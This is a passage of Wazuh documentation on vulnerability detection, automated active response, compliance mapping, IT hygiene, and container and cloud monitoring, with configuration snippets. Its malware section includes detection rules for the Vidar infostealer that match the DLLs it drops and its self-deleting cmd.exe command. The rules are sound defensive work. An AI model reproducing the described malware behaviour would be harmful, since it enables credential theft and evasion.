       "assigner": "cve@mitre.org",
       "published": "2017-01-23",
       "cwe_reference": "CWE-287",
       "title": "CVE-2016-4484 on Ubuntu 16.04 LTS (xenial) - low.",
       "rationale": "The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.",
       "cve": "CVE-2016-4484",
       "state": "Fixed",
       "bugzilla_references": [
         "https://launchpad.net/bugs/1660701"
       ],
       "cvss": {
         "cvss2": {
           "base_score": "7.200000",
           "vector": {
             "integrity_impact": "complete",
             "confidentiality_impact": "complete",
             "availability": "complete",
             "attack_vector": "local",
             "access_complexity": "low",
             "authentication": "none"
           }
         },
         "cvss3": {
           "base_score": "6.800000",
           "vector": {
             "user_interaction": "none",
             "integrity_impact": "high",
             "scope": "unchanged",
             "confidentiality_impact": "high",
             "availability": "high",
             "attack_vector": "physical",
             "access_complexity": "low",
             "privileges_required": "none"
           }
         }
       },
       "updated": "2017-01-26"
     }
   },
   "@sampledata": true,
   "rule": {
     "firedtimes": 290,
     "mail": false,
     "level": 7,
     "pci_dss": [
       "11.2.1",
       "11.2.3"
     ],
     "tsc": [
       "CC7.1",
       "CC7.2"
     ],
     "description": "CVE-2016-4484 affects cryptsetup",
     "groups": [
       "vulnerability-detector"
     ],
     "id": "23504",
     "gdpr": [
       "IV_35.7.d"
     ]
   },
   "location": "vulnerability-detector",
   "id": "1580123327.49031",
   "decoder": {
     "name": "json"
   },
   "timestamp": "2024-05-05T17:44:08.518+0000"
 },
 "fields": {
   "data.vulnerability.published": [
     "2017-01-23T00:00:00.000Z"
   ],
   "data.vulnerability.updated": [
     "2017-01-26T00:00:00.000Z"
   ],
   "timestamp": [
     "2024-05-05T17:44:08.518Z"
   ]
 },
 "highlight": {
   "manager.name": [
     "@opensearch-dashboards-highlighted-field@wazuh-server@/opensearch-dashboards-highlighted-field@"
   ],
   "rule.groups": [
     "@opensearch-dashboards-highlighted-field@vulnerability-detector@/opensearch-dashboards-highlighted-field@"
   ]
 },
 "sort": [
   1714931048518
 ]
}

As you can see above, the alert contains key information about the detected vulnerability. This information includes the CVE information, reference links for further research, and a description that provides a concise explanation of the vulnerability.

Track vulnerability remediation

The Wazuh Vulnerability Detection module also allows you to confirm when a vulnerability has been remediated. This feature detects when a patch or software upgrade resolves a previously detected vulnerability. The feature is enabled using the hotfixes option and is available for Windows endpoints.

Windows vulnerability resolved alert
Use vulnerability reports to identify critical security issues

Wazuh provides users with the ability to download a report that contains security events related to discovered and resolved vulnerabilities. This feature allows users to identify endpoints with unresolved vulnerabilities and keep track of remediation activities.

Vulnerability Detection report generation
Incident response

A security incident refers to any adverse event or activity that risks or threatens the confidentiality, integrity, or availability of digital assets, networks, data, or resources. Such incidents include unauthorized access, data breaches, malware infections, denial-of-service attacks, and any other activities that compromise the security posture of an organization's information technology environment.

The goal of incident response is to effectively handle a security incident and restore normal business operations as quickly as possible. As organizations’ digital assets continuously grow, managing incidents manually becomes increasingly challenging, hence the need for automation.

Automated incident response involves automatic actions taken when responding to security incidents. These actions can include isolating compromised endpoints, blocking malicious IP addresses, quarantining infected devices, or disabling compromised user accounts. By automating incident response, cybersecurity teams reduce response time to detected threats, prevent or minimize the impact of incidents, and efficiently handle a large volume of security events.

Wazuh Active Response module

The Wazuh Active Response module allows users to run automated actions when incidents are detected on endpoints. This improves an organization's incident response processes, enabling security teams to take immediate and automated actions to counter detected threats.

You can also configure the actions to be either stateless or stateful. Stateless active responses are one-time actions, while stateful responses revert their actions after a defined period of time.

Default active response actions

Out-of-the-box active response scripts are available on every operating system that runs the Wazuh agent. Some of the default scripts include:

  • disable-account: Disables a user account.

  • firewall-drop: Adds an IP address to the iptables deny list.

  • firewalld-drop: Adds an IP address to the firewalld drop list.

  • restart.sh: Restarts the Wazuh agent or server.

  • netsh.exe: Blocks an IP address using netsh.

Custom active response actions

One of the benefits of the Wazuh Active Response module is its adaptability. Wazuh allows security teams to create custom active response actions in any programming language, tailoring them to their specific needs. This ensures that when a threat is detected, the response can be customized to align with the organization's requirements.

Automating incident response with Wazuh

To leverage the Wazuh Active Response module, you need to configure the action to be carried out when a specific event occurs on a monitored endpoint. For example, you can configure the Wazuh Active Response module to delete a malicious executable from an infected endpoint. In the examples that follow, we show how the Wazuh Active Response module handles different incidents.
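
A minimal sketch of how a default action can be wired in the Wazuh server ossec.conf is shown below. It binds the firewall-drop command to an illustrative trigger rule with a 5-minute timeout; script naming and defaults may vary between Wazuh versions:

<ossec_config>
  <command>
    <name>firewall-drop</name>
    <executable>firewall-drop</executable>
    <timeout_allowed>yes</timeout_allowed>
  </command>

  <active-response>
    <command>firewall-drop</command>
    <location>local</location>
    <!-- Illustrative rule ID: replace with the rule(s) you want to trigger on -->
    <rules_id>5712</rules_id>
    <timeout>300</timeout>
  </active-response>
</ossec_config>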

Removing malware

You can use the Wazuh Active Response module in conjunction with the File Integrity Monitoring module and VirusTotal integration to detect and remove malicious files from an endpoint.

The image below shows the following activities:

  1. Rule ID 554 is fired when a file is added to the Downloads directory which is monitored with the Wazuh File Integrity Monitoring module.

  2. Rule ID 87105 triggers when Wazuh extracts the file hash, queries the VirusTotal API with it, and receives a response flagging the file as malicious.

  3. Rule ID 553 is fired when a file is deleted from the Downloads directory which is monitored with the Wazuh File Integrity Monitoring module.

  4. Rule ID 110006 is fired when the Wazuh Active Response module deletes the malicious file from the endpoint.

Removing malware activity events

In this scenario, the Wazuh Active Response module automatically removes the malicious file, reducing the time between threat detection and mitigation.

Responding to DoS attacks

The primary goal of a DoS attack is to render the target inaccessible to legitimate users, causing a denial of service. In the image below, we show how the Wazuh Active Response module blocks malicious IP addresses performing a DoS against a web server on an Ubuntu endpoint.

Host blocked by Active Response alerts

In this case, the Wazuh Active Response module automatically blocks the malicious hosts from causing a DoS attack on the web server, thereby ensuring the availability of the web server to authorized users.

Disabling a user account after a brute-force attack

Account lockout is a security measure used to defend against brute force attacks by limiting the number of login attempts a user can make within a specified time. We use the Wazuh Active Response module to disable the user account whose password is being guessed by an attacker.
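
A minimal sketch of how this can be wired in the Wazuh server ossec.conf, using the default disable-account script with a 5-minute timeout; the trigger rule ID is illustrative:

<ossec_config>
  <command>
    <name>disable-account</name>
    <executable>disable-account</executable>
    <timeout_allowed>yes</timeout_allowed>
  </command>

  <active-response>
    <command>disable-account</command>
    <location>local</location>
    <!-- Illustrative rule ID for repeated authentication failures -->
    <rules_id>5712</rules_id>
    <timeout>300</timeout>
  </active-response>
</ossec_config>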

In the image below, the Wazuh Active Response module disables the account on a Linux endpoint and re-enables it after 5 minutes.

Linux account temporarily disabled alerts

In this scenario, when an attacker tries to guess a user's password repeatedly and fails, the account becomes temporarily inaccessible. This impedes attackers who rely on brute-force methods to guess user account passwords.

By utilizing the Wazuh Active Response module, security teams can automate responses to different incidents, thereby ensuring efficient incident response and a more resilient cybersecurity posture.

Regulatory compliance

Regulatory compliance means following laws, rules, regulations, and standards set by government bodies, industry regulators, or other authorities. Organizations need to adhere to regulatory compliance to uphold the integrity of business operations and protect sensitive data.

Adhering to regulatory requirements constitutes a crucial component within an organization's cybersecurity framework. Through alignment with relevant laws, rules, and benchmarks, entities can safeguard their information resources and mitigate the likelihood of security breaches.

Wazuh provides several capabilities for implementing compliance, including:

  • File Integrity Monitoring (FIM).

  • Security Configuration Assessment (SCA).

  • Vulnerability detection.

  • Malware detection.

  • Incident response.

Wazuh provides out-of-the-box rulesets mapped against compliance tags for PCI DSS, HIPAA, NIST 800-53, TSC, and GDPR frameworks and standards.

Regulatory compliance modules

Wazuh allows you to create custom rules and tag them to compliance standards that suit your needs. The following section details use cases for the supported standards.

PCI DSS

PCI DSS (Payment Card Industry Data Security Standard) outlines the security criteria that businesses that process, store, and transmit card data must adhere to. This standard is designed to tighten security measures surrounding cardholder data and lessen fraud within the payment card industry.

Payment card industries can leverage Wazuh capabilities to reinforce PCI DSS adherence. Users can customize these capabilities to align with specific business needs as stipulated by the standard. For example, you can use Wazuh to conduct a PAN scan by creating custom rules that detect the presence of an unmasked Primary Account Number (PAN).

Alert of unmasked Primary Account Number (PAN)
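
A sketch of such a custom rule is shown below. The rule ID, alert level, compliance tag, and regular expression are illustrative and assume that candidate PANs appear in the decoded log message:

<group name="pci_dss,pan_detection,">
  <rule id="100100" level="10">
    <!-- Illustrative PCRE2 pattern for a 16-digit card number, optionally separated by spaces or dashes. -->
    <!-- For production use, scope the rule with if_sid or if_group to limit the events it inspects. -->
    <regex type="pcre2">\b(?:\d[ -]?){15}\d\b</regex>
    <description>Possible unmasked Primary Account Number (PAN) detected in log data.</description>
    <group>pci_dss_3.4,</group>
  </rule>
</group>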

You can find more information on how Wazuh helps organizations meet the PCI DSS standard.

GDPR

The General Data Protection Regulation (GDPR), developed by the European Union, aims to harmonize data privacy laws throughout the continent. The protection of the data of citizens of the European Union is its main priority. The GDPR framework intends to enhance user data privacy and change how organizations in the European Union, and organizations that process EU citizens' data, handle data privacy.

GDPR module dashboard

Wazuh comes with default rules and decoders to identify different kinds of cyberattacks, misconfigured systems, security vulnerabilities, and policy violations. These events are tagged to the relevant GDPR requirements. You can find more information on how Wazuh helps organizations meet the GDPR regulatory compliance.

HIPAA

The Health Insurance Portability and Accountability Act (HIPAA) is a legal framework that enables healthcare institutions and organizations to prevent the unauthorized disclosure of sensitive patient health information. HIPAA sets guidelines and procedures for processing health information to increase the efficiency of healthcare services. It entails guidelines for electronic healthcare transactions and standards for security and distinctive health identification.

The HIPAA framework requires federal privacy protections for health information, a need made more pressing by technological advancements that influence the privacy and security of this information.

Organizations can monitor access and changes made to PII (personally identifiable information) and other confidential documents using the Wazuh FIM module.

You can find more information on how Wazuh helps organizations meet the HIPAA framework.

The image below shows the creation and deletion of a file on a monitored endpoint.

FIM alert of file created and deleted
NIST 800-53

The National Institute of Standards and Technology (NIST) 800-53 is known as Security and Privacy Controls for Federal Information Systems and Organizations. It is a crucial component of the larger NIST Special Publication 800 series.

NIST 800-53 offers recommendations for managing information security and privacy for federal organizations and agencies. It helps organizations safeguard sensitive data while protecting their information systems and data from various threats.

NIST 800-53 module dashboard

You can view the Vulnerability Detection module results on the Wazuh dashboard, which include vulnerable applications and packages on the monitored endpoint. You can find more information on how Wazuh helps organizations meet the NIST 800-53 standard.

Vulnerability Detection module inventory
TSC

The Trust Services Criteria were developed by the Assurance Services Executive Committee (ASEC) of the AICPA. The TSC has five trust service areas which are security, availability, processing integrity, confidentiality, and privacy. Organizations implement TSC to protect customer data from unauthorized access, use, disclosure, modification or destruction.

Wazuh provides out-of-the-box tags for the TSC Common Criteria that give organizations a standardized way to evaluate and report on the effectiveness of their information security policies. You can find more information on how Wazuh helps organizations meet TSC compliance.

The image below shows alerts mapped to Common Criteria CC7.2, which requires ongoing monitoring for all irregular activity indicative of incidents.

TSC common criteria compliance
IT hygiene

IT hygiene refers to the measures that organizations and individuals undertake to maintain the health and security of their IT assets. IT hygiene requires continuous adaptation of practices and processes to counter emerging cybersecurity threats and challenges, fostering a secure and resilient IT environment. Organizations implement IT hygiene practices to prevent cyberattacks, data breaches, and other security concerns that may result in data loss, service disruption, reputational harm, or financial instability.

System inventory

An up-to-date system inventory helps organizations optimize asset visibility in their environment and is essential for maintaining good IT hygiene. The inventory includes hardware and operating system information, installed packages, running processes and services, network ports, users, groups, and browser extensions. Wazuh agents use the Wazuh Syscollector module to collect inventory data from monitored endpoints and send it to the Wazuh server. All data is aggregated into dedicated indices in the Wazuh indexer and accessible through the Wazuh dashboard, enabling rapid detection and remediation without endpoint-by-endpoint inspection.
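
The Syscollector module is enabled by default in the Wazuh agent configuration. A minimal sketch of the wodle block controlling which inventory data is collected and how often:

<wodle name="syscollector">
  <disabled>no</disabled>
  <interval>1h</interval>
  <scan_on_start>yes</scan_on_start>
  <hardware>yes</hardware>
  <os>yes</os>
  <network>yes</network>
  <packages>yes</packages>
  <ports all="no">yes</ports>
  <processes>yes</processes>
</wodle>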

Navigate to Security operations > IT Hygiene to generate system inventory reports from the Wazuh IT hygiene module on the Wazuh dashboard.

Inventory data on the Wazuh dashboard

You can also generate property-specific reports for a monitored endpoint. For example, you can get a report containing the list of installed software or a list of running processes on a monitored endpoint.

Inventory data download

The inventory data collected can be queried using the Wazuh server API or Wazuh indexer API, which retrieves nested data in JSON format. For example, you can query the package inventory to check for the wazuh-agent package on a monitored endpoint using the Wazuh > Tools > API Console module on the Wazuh dashboard. Command line tools like cURL can also be used to query the inventory database.

Querying the package inventory using the Dev Tools
Security Configuration Assessment

One of the objectives of implementing good IT hygiene is to reduce the attack surface of your organization. The Wazuh SCA module periodically scans monitored endpoints against policies based on the Center for Internet Security (CIS) benchmarks to identify security misconfigurations and flaws. The CIS benchmarks are essential guidelines for establishing a secure baseline configuration for critical assets. This minimizes vulnerabilities resulting from misconfigurations and reduces the risk of security breaches.
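
The SCA module is enabled by default on Wazuh agents and scans against the policy files shipped for the endpoint's platform. A minimal sketch of the configuration block controlling scan scheduling:

<sca>
  <enabled>yes</enabled>
  <scan_on_start>yes</scan_on_start>
  <interval>12h</interval>
  <skip_nfs>yes</skip_nfs>
</sca>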

The Configuration Assessment module on the Wazuh dashboard provides each agent's SCA scan result. The results show the number of checks performed on the endpoint, how many failed, and the number of checks that passed. It also shows a score calculated based on the number of tests passed, giving you an overview of the level of compliance.

You can gain more insights from the Wazuh dashboard to view the passed and failed checks. Also, you can generate a CSV report to aid remediation activities, thereby improving the endpoint security posture.

SCA results details and download

You can see information such as rationale, remediation steps, and description of the checks performed on the endpoint on the Wazuh dashboard. This information is included in the report generated by Wazuh.

SCA check result details

The SCA scan result above indicates a failure because the endpoint allows you to mount the cramfs file system. You can implement the remediation suggested in the report to improve the security posture.

Vulnerability management

The Wazuh vulnerability detection module identifies vulnerable applications by using vulnerability information available in our Wazuh CTI. Each vulnerability ID on the dashboard also links to its entry in the Wazuh CTI.

Vulnerability Detection inventory dashboard

You can download a report that contains security events related to discovered and resolved vulnerabilities on a monitored endpoint from the Wazuh dashboard. This feature allows you to identify endpoints with unresolved vulnerabilities and keep track of remediation activities.

Vulnerabilities data download

The Wazuh vulnerability detection module also enables you to track remediation activities, which could serve as a progress report on improving or maintaining IT hygiene. For example, when a vulnerability is remediated, an alert is generated on the Wazuh dashboard. This feature detects when a patch or software upgrade resolves a previously detected vulnerability.

Remediation alerts
Malware detection

Malware detection is essential for safeguarding computer systems and networks from cyber threats. Organizations can improve their IT hygiene by identifying and mitigating malicious software that can cause data breaches, system compromises, and financial losses.

Wazuh offers an out-of-the-box ruleset designed to recognize malware patterns and trigger alerts for quick response. Wazuh also allows security analysts to create custom rules tailored to their environment, thereby optimizing their malware detection efforts. For example, we created custom rules to detect Vidar infostealer malware using Wazuh.

<group name="windows,sysmon,vidar_detection_rule,">
<!-- Vidar downloads malicious DLL files on victim endpoint -->
  <rule id="100084" level="10">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\.+(exe|dll|bat|msi)</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)\\\\ProgramData\\\\(freebl3|mozglue|msvcp140|nss3|softokn3|vcruntime140)\.dll</field>
    <description>Possible Vidar malware detected. $(win.eventdata.targetFilename) was downloaded on $(win.system.computer)</description>
    <mitre>
      <id>T1056.001</id>
    </mitre>
  </rule>
<!-- Vidar loads malicious DLL files -->
  <rule id="100085" level="12">
    <if_sid>61609</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\.+(exe|dll|bat|msi)</field>
    <field name="win.eventdata.imageLoaded" type="pcre2">(?i)\\\\programdata\\\\(freebl3|mozglue|msvcp140|nss3|softokn3|vcruntime140)\.dll</field>
    <description>Possible Vidar malware detected. Malicious $(win.eventdata.imageLoaded) file loaded by $(win.eventdata.image)</description>
    <mitre>
      <id>T1574.002</id>
    </mitre>
  </rule>
<!-- Vidar deletes itself or a malicious process it creates -->
  <rule id="100086" level="7" frequency="5" timeframe="360">
    <if_sid>61603</if_sid>
    <if_matched_sid>100085</if_matched_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\\\cmd.exe</field>
    <match type="pcre2">cmd.exe\\" /c timeout /t \d{1,}.+del /f /q \\".+(exe|dll|bat|msi)</match>
    <description>Possible Vidar malware detected. Malware deletes $(win.eventdata.parentCommandLine)</description>
    <mitre>
      <id>T1070.004</id>
    </mitre>
  </rule>
</group>

The rules above detect specific behaviors of the Vidar infostealer malware and trigger alerts on the dashboard.

Vidar malware alerts

Wazuh boosts its malware detection capabilities by integrating with threat intelligence sources such as VirusTotal, MISP, and more. Wazuh also offers support for integrating third-party malware detection tools such as ClamAV and Windows Defender. By collecting and analyzing logs from third-party malware detection tools, Wazuh provides security analysts with a centralized monitoring platform. Wazuh increases the efficiency in detecting malware by combining diverse threat intelligence from third-party tools, thereby improving the organization's IT hygiene.

The image below shows an alert of an event from VirusTotal processed by the Wazuh server.

VirusTotal finding alert

Wazuh uses CDB lists (constant databases) containing indicators of compromise (IOCs) to detect malware. These lists contain known malware IOCs such as file hashes, IP addresses, and domain names. Wazuh proactively identifies malicious files by comparing the identified IOCs with the information stored in the CDB lists.

Malware detected alert
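
A minimal sketch of how such a CDB list can be wired in, assuming a list of MD5 hashes stored at etc/lists/malware-hashes and FIM (syscheck) events as the source; the rule ID and alert level are illustrative:

<!-- Declare the CDB list in the Wazuh server ossec.conf -->
<ossec_config>
  <ruleset>
    <list>etc/lists/malware-hashes</list>
  </ruleset>
</ossec_config>

<!-- Custom rule (local_rules.xml) matching FIM events against the list -->
<group name="malware,">
  <rule id="110002" level="12">
    <if_sid>554, 550</if_sid>
    <list field="md5" lookup="match_key">etc/lists/malware-hashes</list>
    <description>File with a known malicious MD5 hash detected.</description>
  </rule>
</group>
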
Regulatory compliance

Regulatory standards provide a global benchmark for best business practices to help improve customer trust and business reputation. Compliance with regulatory standards also helps organizations to enhance their IT hygiene.

Wazuh streamlines the process of meeting regulatory compliance obligations by offering a solution that addresses requirements of industry standards such as PCI DSS, HIPAA, GDPR, and others.

Security operations module

Wazuh uses its capabilities such as the SCA, vulnerability detection, FIM, and more to identify and report compliance violations. It also provides dedicated compliance dashboards to help monitor compliance status, identify improvement areas, and take appropriate remediation actions.

For example, you can get a general overview of the PCI DSS requirement of a monitored endpoint on the Wazuh dashboard.

PCI DSS dashboard

You can drill down to the individual PCI DSS requirement from the Controls tab to discover where the policy violations occurred.

PCI DSS requirement violations

The image below shows alerts generated for vulnerabilities that violate the PCI DSS Requirement 11.2.1.

PCI DSS requirement violation details

This feature is also available for other compliance standards such as GDPR, TSC, HIPAA, and NIST 800-53.

Container security

Container security is an IT practice that is focused on safeguarding containers and their applications against security threats. Organizations can gain visibility into the usage of both containers and the applications they contain by implementing robust security measures in such an environment.

Containers offer lightweight, isolated environments with application code, runtime, and dependencies. They are widely used to deploy and scale applications both on-premises and in the cloud. As container applications and infrastructure become more popular, it becomes essential to protect them from potential threats.

Wazuh for container security

Wazuh integrates with container platforms like Docker and Kubernetes and actively monitors container runtime events, application logs, and overall container health. Wazuh identifies anomalies by evaluating container logs against predefined rules. Additionally, it maintains a record of container engine actions to detect unauthorized activities in a containerized environment. It also monitors container health metrics to help prevent performance bottlenecks.

Wazuh container security features comprise monitoring container runtimes, tracking containerized application logs, monitoring container resource utilization, centralized logging, and container alert notifications. This comprehensive set of capabilities enhances security and streamlines incident response.

Container runtime monitoring

Organizations can enhance the security of their containerized applications by monitoring container events. They can proactively address unexpected behavior by promptly responding to alerts triggered by predefined rules. Wazuh also provides insight into container engine interactions and detects irregularities in containerized applications.

Monitoring the container engine

Wazuh captures real-time events performed by the Docker engine via its Docker listener module. This ensures that no crucial Docker event or operation goes undetected.
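
The Docker listener is enabled through a wodle block in the configuration of the Wazuh agent running on the Docker host, assuming the Python Docker library is installed on that host. A minimal sketch:

<wodle name="docker-listener">
  <disabled>no</disabled>
  <interval>10m</interval>
  <attempts>5</attempts>
  <run_on_start>yes</run_on_start>
</wodle>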

The Monitoring user interaction with Docker resources documentation demonstrates how Wazuh enhances visibility into the interactions of the container engine with the containers and the images.

Docker container user interaction alerts

Wazuh also monitors the creation and destruction of resources in Kubernetes clusters to help identify unauthorized actions and potential security breaches.

The blog post on Auditing Kubernetes with Wazuh demonstrates how to monitor Kubernetes resource interactions with Wazuh.

Kubernetes resource interaction alerts
Monitoring containerized application logs

Wazuh allows organizations to monitor containerized applications. It provides visibility into the applications running inside containers. When the application events are forwarded to the Wazuh manager, security engineers can create custom rules that align with the unique requirements of their organization. This facilitates a highly personalized approach that improves overall visibility into the containers and the applications they host.

The Monitoring container runtime documentation has more information about monitoring containerized application logs.

Monitoring containerized application logs
Monitor container resource utilization with Wazuh

Wazuh tracks and analyzes the resource consumption of containerized applications. It provides insights into the CPU, memory, and network usage statistics of containers, assisting in identifying performance bottlenecks.

Wazuh provides customizable alerts and notifications, enabling organizations to detect and proactively respond to unusual resource spikes or consumption patterns.

The blog post on Docker container security monitoring with Wazuh demonstrates how Wazuh monitors network utilization in a containerized environment.

Monitoring network utilization in a containerized environment
Centralized logging and visualization of container events

Wazuh centralizes container event logging and visualization. Its scalable indexer aggregates logs into a powerful search and analytics engine, providing real-time insights. This indexer handles event influx while also supporting compliance needs such as log retention policies.

Wazuh enables organizations to view container logs from a customized dashboard. Security professionals can track and analyze unfolding activities, swiftly identifying threats and unauthorized actions. This early detection enables security professionals to respond swiftly to security incidents as they arise, establishing a proactive approach to minimizing risks.

The image below displays the customized container dashboard of Wazuh, where events from all containers are showcased.

Customized container dashboard
Container alert notification with Wazuh

Wazuh integrates with messaging platforms like email and Slack. It also integrates with case management solutions, like Jira, for incident response and real-time alerting. This ensures that security teams are promptly notified whenever potential threats or unauthorized actions occur in containerized environments.

The documentation on External API integration explains how the Integrator daemon allows Wazuh to connect to external APIs and case management tools like PagerDuty.

Connect to external APIs and case management systems
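
As an illustration of such an integration, a minimal Slack notification block in the Wazuh server ossec.conf might look like the following; the hook URL is a placeholder, and only alerts at or above the configured level are forwarded:

<integration>
  <name>slack</name>
  <hook_url>https://hooks.slack.com/services/REPLACE_WITH_YOUR_HOOK</hook_url>
  <level>10</level>
  <alert_format>json</alert_format>
</integration>
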
Posture management

Cloud Security Posture Management (CSPM) encompasses a set of practices aimed at safeguarding the security and compliance of cloud environments. This involves the ongoing assessment and monitoring of cloud workloads to pinpoint misconfigurations, vulnerabilities, and potential threats. CSPM also offers actionable remediation steps for addressing security risks, ultimately bolstering the overall security posture of cloud environments.

Wazuh provides security and compliance monitoring for various cloud platforms, including Google Cloud Platform (GCP), Amazon Web Services (AWS), and Microsoft Azure. We leverage Wazuh for CSPM across the platforms listed below.

Google Cloud Platform

Wazuh connects with GCP through the Google Cloud publisher and subscriber services, also known as GCP Pub/Sub. These messaging services facilitate the transmission of log data from a GCP workload to a Wazuh instance. The image below shows the integration between GCP and Wazuh.

Integration between Wazuh and Google Cloud Platform

You can configure your Wazuh instance to receive GCP logs using the Pub/Sub service. Once configured, you can go to the Google Cloud module in the Wazuh dashboard to view logs related to your GCP services. We provide detailed guidelines on configuring Wazuh to receive GCP logs using the Pub/Sub service in our using Wazuh to monitor GCP services documentation.

Using Wazuh to monitor Google Cloud Platform
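
A minimal sketch of the GCP module configuration on the Wazuh server, assuming a service account credentials file and an existing Pub/Sub subscription; the project and subscription names are placeholders:

<gcp-pubsub>
  <enabled>yes</enabled>
  <pull_on_start>yes</pull_on_start>
  <interval>1m</interval>
  <project_id>your-gcp-project-id</project_id>
  <subscription_name>wazuh-subscription</subscription_name>
  <credentials_file>credentials.json</credentials_file>
</gcp-pubsub>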

The image below shows an example log received from a monitored GCP instance on the Wazuh dashboard.

Example GCP log on the Wazuh dashboard
Amazon Web Services

Wazuh provides CSPM for your AWS workloads by monitoring AWS services and instances. Monitoring your AWS services includes collecting and analyzing log data about your AWS infrastructure using the Wazuh module for AWS.

You can use the Amazon Web Services module in the Wazuh dashboard to view logs related to AWS services.

Enabling AWS module in the Wazuh dashboard
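
A minimal sketch of the Wazuh module for AWS, assuming CloudTrail logs are delivered to an S3 bucket and that credentials are available through an AWS profile; the bucket name is a placeholder:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <bucket type="cloudtrail">
    <name>your-cloudtrail-bucket</name>
    <aws_profile>default</aws_profile>
  </bucket>
</wodle>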

Follow the AWS prerequisite documentation to set up your Wazuh instance for AWS log collection. The documentation shows a list of the supported AWS services that Wazuh can monitor. The image below shows an Amazon Security Hub log received using the CloudWatch service.

Amazon Security Hub log
Amazon Security Hub log – Details

This control is designed to assess the security configuration of S3 buckets by verifying that user permissions are not granted through access control lists (ACLs). It is recommended to use AWS Identity and Access Management (IAM) policies rather than S3 bucket ACLs for managing user permissions.

Microsoft Azure

Wazuh integrates with Azure using the Log Analytics Workspace. The Azure Log Analytics workspace is a service that facilitates storing log data from Azure Monitor and other Azure services, such as Microsoft Defender for Cloud. Wazuh provides a native integration module for Azure that retrieves logs from the Log Analytics Workspace.

Azure Log Analytics Workspace integration with Wazuh overview

We provide detailed guidelines on configuring Wazuh to receive Azure Cloud logs using the Log Analytics Workspace in our Azure Log Analytics documentation. Once configured, you can set up your Wazuh deployment to retrieve Recommendations, Security alerts, and Regulatory compliance logs for your Azure cloud infrastructure.
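
A minimal sketch of the azure-logs module querying the Log Analytics API; the authentication file path, tenant domain, query, and workspace ID are placeholders, and option names may vary slightly between Wazuh versions:

<wodle name="azure-logs">
  <disabled>no</disabled>
  <run_on_start>yes</run_on_start>
  <log_analytics>
    <auth_path>/var/ossec/wodles/azure/log_analytics_auth.txt</auth_path>
    <tenantdomain>yourdomain.onmicrosoft.com</tenantdomain>
    <request>
      <tag>azure-activity</tag>
      <query>AzureActivity</query>
      <workspace>REPLACE_WITH_WORKSPACE_ID</workspace>
      <time_offset>1d</time_offset>
    </request>
  </log_analytics>
</wodle>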

The image below shows Azure security posture management logs received on Wazuh.

Azure security posture management logs
Cloud workload protection

The Wazuh security platform provides threat detection, configuration compliance, and continuous monitoring for on-premises, cloud, and hybrid environments. It protects cloud workloads by monitoring the infrastructure at two levels:

  • Endpoint level: monitoring cloud instances or virtual machines using the lightweight Wazuh agent.

  • Cloud infrastructure level: monitoring cloud service activity by collecting and analyzing data from the provider API. Wazuh supports Amazon AWS, Microsoft Azure, and Google Cloud.

We describe some benefits of using Wazuh to enhance security operations, protect cloud-native applications, and facilitate compliance efforts for a secure cloud environment.

Cloud log data analysis and retention

Cloud environments generate large amounts of log data, vital for identifying security incidents. The Wazuh rules and decoders are responsible for parsing and analyzing log data to detect anomalous events. Wazuh collects and analyzes log data from various cloud platforms and services, such as AWS, Azure, Google Cloud, Office 365, and GitHub.

The image below is an example of an AWS dashboard on Wazuh showing the trend of events collected from the cloud infrastructure.

AWS dashboard on Wazuh

Wazuh monitors and logs activities in the cloud, providing a centralized view of user actions across the entire cloud infrastructure. Wazuh has out-of-the-box rules to detect suspicious or unauthorized activities. In addition to the built-in rules, users can create custom rules to strengthen threat detection.

Amazon web services

Wazuh has dedicated modules for monitoring and securing AWS cloud infrastructure. Some of the AWS services that Wazuh monitors include:

  • Amazon GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior, ensuring the protection of AWS accounts, workloads, and data stored in Amazon S3.

  • Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.

  • AWS Key Management Service (KMS) is used for cryptographic key management across AWS services.

  • Amazon Macie is a fully managed data security and privacy service. It automatically detects unencrypted S3 buckets, publicly accessible buckets, and buckets shared with external AWS accounts.

  • Amazon Virtual Private Cloud (VPC) provisions a logically isolated section of the AWS Cloud where AWS resources can be launched on a virtual network defined by the user.

  • AWS Config assesses, audits, and evaluates the configurations of your AWS resources. It helps the users review changes in configurations and relationships between AWS resources.

  • AWS CloudTrail enables governance, compliance, operational auditing, and risk auditing of your AWS account. With CloudTrail, you can log, continuously monitor, and retain account activity related to actions across your AWS infrastructure.

  • AWS Trusted Advisor helps users reduce costs, increase performance, and improve security by optimizing their AWS environment. It provides real-time guidance to help users provision their resources following AWS best practices.

  • AWS Web Application Firewall (WAF) helps protect your web applications or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources.

Microsoft Azure

Wazuh has a dedicated module that pulls logs from and monitors the Azure platform. This module obtains data from critical Azure services, including:

  • Log Analytics API: The Log Analytics API is a core component of the Azure Monitor service and is used to aggregate and analyze log data. The sources of such data are cloud applications, operating systems, and Azure resources. The Wazuh module for Azure is capable of querying the Log Analytics API, pulling the logs collected by the Azure Monitor service.

  • Blob Storage API: Logs from Azure services are optionally pushed to Azure Blob Storage. Specifically, it is possible to configure an Azure service to export logs to a container in a storage account created for that purpose. Afterward, the Wazuh agent will download those logs via its integration with the Blob Storage API.

  • Active Directory Graph API: The Azure Active Directory (AD) Graph API provides access to Azure AD through REST API endpoints. Wazuh uses it to monitor Active Directory events (for example, creation of a new user, update of user properties, or disablement of user accounts).

Google Cloud Platform

Wazuh monitors Google Cloud services by pulling events from the Google Pub/Sub messaging service, a middleware for event ingestion and delivery. This integration helps detect threats targeting your Google Cloud assets. For more information, please refer to Using Wazuh to monitor GCP services.

Office 365

Wazuh includes a dedicated module designed to interact with the Office 365 Management Activity API. This module is responsible for fetching logs from Office 365 and making them available for analysis within the Wazuh platform. The Management Activity API serves as the source of audit logs for Office 365, containing information about various actions and events within the Office 365 environment. These logs are organized into tenant-specific content blobs and classified based on their content type and source. Wazuh performs analysis, alerting, and reporting on these logs, enhancing the security and compliance monitoring capabilities within the Office 365 environment. For more detailed information, please refer to Using Wazuh to monitor Office 365.

GitHub

